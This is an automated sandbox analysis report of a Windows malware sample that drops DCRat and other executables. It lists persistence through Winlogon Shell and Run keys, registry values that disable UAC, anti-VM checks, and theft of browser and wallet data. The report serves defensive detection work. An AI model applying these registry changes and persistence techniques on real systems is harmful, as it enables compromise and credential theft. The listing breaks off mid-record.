Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 02:26
Static task
static1
Behavioral task
behavioral1
Sample
48a8ee49651a74a74baca1f7c94729e5.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
48a8ee49651a74a74baca1f7c94729e5.exe
Resource
win10v2004-20240611-en
General
-
Target
48a8ee49651a74a74baca1f7c94729e5.exe
-
Size
11.5MB
-
MD5
48a8ee49651a74a74baca1f7c94729e5
-
SHA1
0339e2c61f6cdb9e37ca03f9d97e7811593eba23
-
SHA256
9ce7950dbd49b8c82b25df40fa94e88830361b8625d2f91214fa7583a346f992
-
SHA512
6bd551233c93c3fbe66b8eec7f5ae2f8d8b42b0918ff13384823c3ebb4d5993a6af3f2ec4280880d396414a9a770ee0dc909b78ae4a98579f32ba2a2855f1448
-
SSDEEP
196608:tHHbgJSiavNLVOOHrVB71ZwMFOc3aVeYz4t/+KwgPuZ9RaD:h7gJA3tHMC3a5z4XwgPo9y
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 4 IoCs
Processes:
fontsessionruntime.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" fontsessionruntime.exe -
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5996 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5748 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4808 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5576 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5580 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5924 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5224 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5428 1856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4132 1856 schtasks.exe -
Processes:
fontsessionruntime.exeSystem.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontsessionruntime.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe dcrat behavioral2/memory/5868-2020-0x0000000000650000-0x0000000000A52000-memory.dmp dcrat C:\Program Files (x86)\Windows Photo Viewer\conhost.exe dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
cd57e4c171d6e8f5ea8b8f824a6a7316.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Blocklisted process makes network request 2 IoCs
Processes:
SolaraBootstrapper.exeflow pid process 29 4976 SolaraBootstrapper.exe 32 4976 SolaraBootstrapper.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 6040 powershell.exe 5160 powershell.exe 5548 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeattrib.exeBuilt.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cd57e4c171d6e8f5ea8b8f824a6a7316.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
48a8ee49651a74a74baca1f7c94729e5.exex12.exex11.exex9.exex8.exex7.exex6.exefontsessionruntime.exex4.exeCheatLauncherV2.exeSolaraBootstrapper.exeWScript.exex10.exex5.exeDCRatBuild.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation 48a8ee49651a74a74baca1f7c94729e5.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x12.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x11.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x9.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x8.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x7.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x6.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation fontsessionruntime.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x4.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation CheatLauncherV2.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x10.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation x5.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation DCRatBuild.exe -
Executes dropped EXE 18 IoCs
Processes:
x12.exex11.exex10.exex9.exex8.exex7.exex6.exex5.exex4.exeCheatLauncherV2.exeDCRatBuild.exeBuilt.exeSolaraBootstrapper.exeBuilt.execd57e4c171d6e8f5ea8b8f824a6a7316.exefontsessionruntime.exerar.exeSystem.exepid process 4256 x12.exe 3760 x11.exe 3272 x10.exe 1068 x9.exe 936 x8.exe 1920 x7.exe 2212 x6.exe 1084 x5.exe 3164 x4.exe 4300 CheatLauncherV2.exe 1264 DCRatBuild.exe 2092 Built.exe 4976 SolaraBootstrapper.exe 2656 Built.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5868 fontsessionruntime.exe 1804 rar.exe 5760 System.exe -
Loads dropped DLL 22 IoCs
Processes:
Built.execd57e4c171d6e8f5ea8b8f824a6a7316.exepid process 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 2656 Built.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/4028-1804-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-1806-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-1807-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-1805-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2134-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2178-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2180-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2181-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2183-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2203-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2205-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2207-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2259-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2270-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2291-0x0000000180000000-0x0000000180B15000-memory.dmp themida behavioral2/memory/4028-2293-0x0000000180000000-0x0000000180B15000-memory.dmp themida -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI20922\python312.dll upx behavioral2/memory/2656-163-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ctypes.pyd upx behavioral2/memory/2656-169-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ssl.pyd upx behavioral2/memory/2656-187-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI20922\libcrypto-3.dll upx behavioral2/memory/2656-193-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp upx behavioral2/memory/2656-195-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp upx behavioral2/memory/2656-199-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp upx behavioral2/memory/2656-198-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp upx behavioral2/memory/2656-203-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp upx behavioral2/memory/2656-202-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp upx behavioral2/memory/2656-205-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp upx behavioral2/memory/2656-209-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp upx behavioral2/memory/2656-210-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp upx behavioral2/memory/2656-295-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp upx behavioral2/memory/2656-333-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp upx behavioral2/memory/2656-450-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp upx behavioral2/memory/2656-417-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp upx behavioral2/memory/2656-332-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp upx behavioral2/memory/2656-2074-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp upx behavioral2/memory/2656-2080-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp upx behavioral2/memory/2656-2078-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp upx behavioral2/memory/2656-2077-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp upx behavioral2/memory/2656-2068-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp upx behavioral2/memory/2656-2073-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp upx behavioral2/memory/2656-2072-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp upx behavioral2/memory/2656-2069-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp upx behavioral2/memory/2656-2150-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp upx behavioral2/memory/2656-2156-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp upx behavioral2/memory/2656-2155-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp upx behavioral2/memory/2656-2154-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp upx behavioral2/memory/2656-2153-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp upx behavioral2/memory/2656-2152-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp upx behavioral2/memory/2656-2151-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp upx behavioral2/memory/2656-2149-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp upx behavioral2/memory/2656-2148-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp upx behavioral2/memory/2656-2147-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp upx behavioral2/memory/2656-2142-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp upx behavioral2/memory/2656-2145-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp upx behavioral2/memory/2656-2144-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp upx behavioral2/memory/2656-2143-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp upx behavioral2/memory/2656-2146-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
fontsessionruntime.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\agentInto\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\agentInto\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" fontsessionruntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" fontsessionruntime.exe -
Processes:
System.execd57e4c171d6e8f5ea8b8f824a6a7316.exefontsessionruntime.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" System.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontsessionruntime.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
Processes:
flow ioc 73 raw.githubusercontent.com 114 pastebin.com 32 raw.githubusercontent.com 42 raw.githubusercontent.com 41 raw.githubusercontent.com 72 raw.githubusercontent.com 79 raw.githubusercontent.com 113 pastebin.com 31 raw.githubusercontent.com 40 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 83 ip-api.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
cd57e4c171d6e8f5ea8b8f824a6a7316.exepid process 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Drops file in Program Files directory 50 IoCs
Processes:
msedgewebview2.exefontsessionruntime.exedescription ioc process File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-kn.hyb msedgewebview2.exe File created C:\Program Files\Microsoft Office 15\ClientX64\System.exe fontsessionruntime.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.json msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-und-ethi.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.json msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\_metadata\verified_contents.json msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-en-us.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-eu.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-1901.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-en-gb.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-es.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-et.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-sl.hyb msedgewebview2.exe File created C:\Program Files (x86)\Windows Photo Viewer\088424020bedd6 fontsessionruntime.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.fingerprint msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-cu.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-tk.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\manifest.fingerprint msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\manifest.json msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-pt.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.fingerprint msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-bn.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-te.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nn.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ta.hyb msedgewebview2.exe File created C:\Program Files (x86)\Windows Photo Viewer\conhost.exe fontsessionruntime.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-bg.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-gu.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\crl-set msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ga.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-ch-1901.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-or.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-pa.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\protocols.json msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-cy.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-fr.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-mr.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nb.hyb msedgewebview2.exe File created C:\Program Files\Microsoft Office 15\ClientX64\27d1bcfc3c54e0 fontsessionruntime.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-as.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hr.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hu.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-la.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-mn-cyrl.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-da.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-1996.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hy.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ml.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-be.hyb msedgewebview2.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hi.hyb msedgewebview2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 3232 tasklist.exe 1264 tasklist.exe 5780 tasklist.exe 5756 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedgewebview2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
msedgewebview2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedgewebview2.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634103945811158" msedgewebview2.exe -
Modifies registry class 2 IoCs
Processes:
DCRatBuild.exefontsessionruntime.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings DCRatBuild.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings fontsessionruntime.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5428 schtasks.exe 5996 schtasks.exe 5748 schtasks.exe 4772 schtasks.exe 4808 schtasks.exe 2000 schtasks.exe 5924 schtasks.exe 5224 schtasks.exe 4132 schtasks.exe 5464 schtasks.exe 5576 schtasks.exe 5580 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execd57e4c171d6e8f5ea8b8f824a6a7316.exepowershell.exepowershell.exefontsessionruntime.exepowershell.exepowershell.exeSystem.exepid process 4976 SolaraBootstrapper.exe 4976 SolaraBootstrapper.exe 5160 powershell.exe 5160 powershell.exe 5924 powershell.exe 5924 powershell.exe 5548 powershell.exe 5548 powershell.exe 6040 powershell.exe 6040 powershell.exe 2928 powershell.exe 2928 powershell.exe 5160 powershell.exe 6040 powershell.exe 5924 powershell.exe 5548 powershell.exe 2928 powershell.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5316 powershell.exe 5316 powershell.exe 5316 powershell.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 5868 fontsessionruntime.exe 4028 